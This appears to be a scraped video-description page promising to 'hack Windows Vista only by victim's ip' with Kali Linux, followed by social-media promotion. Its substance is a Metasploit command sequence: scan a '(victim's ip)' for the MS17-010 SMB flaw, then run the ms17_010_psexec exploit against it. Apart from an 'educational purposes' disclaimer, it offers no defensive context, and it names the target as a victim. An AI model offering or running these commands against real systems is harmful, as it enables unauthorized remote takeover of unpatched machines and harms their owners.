How to hack Windows Vista only by victim's ip using Kali Linux 2018.3

kHbkOKQBNk0/default.jpg

How to hack Windows Vista only by victim's ip using Kali Linux 2018.3

!!! ONLY FOR EDUCATIONAL PURPOSES !!!

commands:

use auxiliary/scanner/smb/smb_ms17_010
set rhosts (victim's ip)
exploit
use exploit/windows/smb/ms17_010_psexec
set rhost (victim's ip)
exploit
...

THANK YOU FOR WATCHING
SUBSCRIBE
SHARE
LIKE
FOLLOW US ON INSTAGRAM
https://www.instagram.com/kali_linux_...
FOLLOW US ON TWITTER
https://twitter.com/KALILINUXTRICKS
SUPPORT US ON PATREON
https://www.patreon.com/kalilinuxtricks

kHbkOKQBNk0/default.jpg
How to hack Windows Vista only by victim's ip using Kali Linux 2018.3 How to hack Windows Vista only by victim's ip using Kali Linux 2018.3 Reviewed by Anonymous on September 06, 2018 Rating: 5